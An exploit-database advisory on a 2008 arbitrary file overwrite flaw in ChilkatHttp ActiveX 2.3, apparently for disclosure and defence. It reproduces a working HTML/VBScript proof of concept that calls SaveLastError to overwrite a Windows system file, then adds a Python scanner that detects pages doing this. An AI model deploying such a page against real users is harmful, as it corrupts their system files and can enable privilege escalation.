Vendor: ChilkatHttp ActiveX
By: shinnai
CVSS: 9.3 HIGH
Arbitrary Files Overwrite
CWE: 20
Product Name: ChilkatHttp ActiveX
Affected Version From: 2.3
Affected Version To: 2.3
Patch Exists: YES
Related CWE: N/A
CPE: a:chilkatsoft:chilkathttp_activex
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2008

ChilkatHttp ActiveX 2.3 Arbitrary Files Overwrite

ChilkatHttp ActiveX 2.3 contains an arbitrary file overwrite vulnerability. The control's SaveLastError method writes to a path supplied by the caller, so a page that loads the control can overwrite arbitrary files on the system. An attacker can use this to overwrite system files and gain elevated privileges.

Mitigation:

Upgrade to the latest version of ChilkatHttp ActiveX.

Exploit-DB raw data:

--------------------------------------------------------------------
 ChilkatHttp ActiveX 2.3 Arbitrary Files Overwrite
 url: www.chilkatsoft.com

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org

 This was written for educational purposes. Use it at your own risk.
 Author will not be responsible for any damage.
--------------------------------------------------------------------
<object classid='clsid:B973393F-27C7-4781-877D-8626AAEDF119' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
 Sub tryMe
  test.SaveLastError "c:\windows\system_.ini"
  MsgBox "Exploit completed!"
 End Sub
</script>

# milw0rm.com [2008-04-01]
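
An added detection example (not part of the original advisory or the author's code): a Python scanner that flags HTML pages which bind an `<object>` tag to the CLSID shown in the proof of concept above and then call `SaveLastError` on that object. The function and variable names are assumptions made for this example, and the sample pages are constructed.

```python
import re
from html.parser import HTMLParser

# CLSID copied from the <object> tag in the proof of concept on this page.
CHILKAT_HTTP_CLSID = "B973393F-27C7-4781-877D-8626AAEDF119"
# Matches  name.SaveLastError "path"  (VBScript) or  name.SaveLastError("path")  (JScript).
CALL_RE = re.compile(r'\b(\w+)\s*\.\s*SaveLastError\s*\(?\s*["\']([^"\']*)["\']', re.I)


class ObjectCollector(HTMLParser):
    """Collects ids of <object> tags bound to the CLSID, plus all script text."""

    def __init__(self):
        super().__init__()
        self.ids, self.scripts, self.in_script = set(), [], False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "object" and CHILKAT_HTTP_CLSID.lower() in a.get("classid", "").lower():
            self.ids.add(a.get("id", "").lower())
        if tag == "script":
            self.in_script = True
        # Inline event handlers (onclick=...) can carry the call as well.
        self.scripts += [v for k, v in a.items() if k.startswith("on")]

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.scripts.append(data)


def scan_page(html):
    """Return (object_id, path) for each SaveLastError call on a flagged object."""
    collector = ObjectCollector()
    collector.feed(html)
    collector.close()
    calls = CALL_RE.findall("\n".join(collector.scripts))
    return [(name, path) for name, path in calls if name.lower() in collector.ids]


# Constructed sample pages (placeholder paths, not taken from the advisory).
SAMPLE_FLAGGED = """<object classid='clsid:b973393f-27c7-4781-877d-8626aaedf119' id='http1'></object>
<script language='vbscript'>
  http1.SaveLastError "C:\\example\\placeholder.txt"
</script>"""
SAMPLE_CLEAN = "<script>other.SaveLastError('x.txt')</script>"

if __name__ == "__main__":
    print(scan_page(SAMPLE_FLAGGED), scan_page(SAMPLE_CLEAN))
```

The scanner only covers static `<object>` instantiation as in the proof of concept; a control created by other means would need its own check.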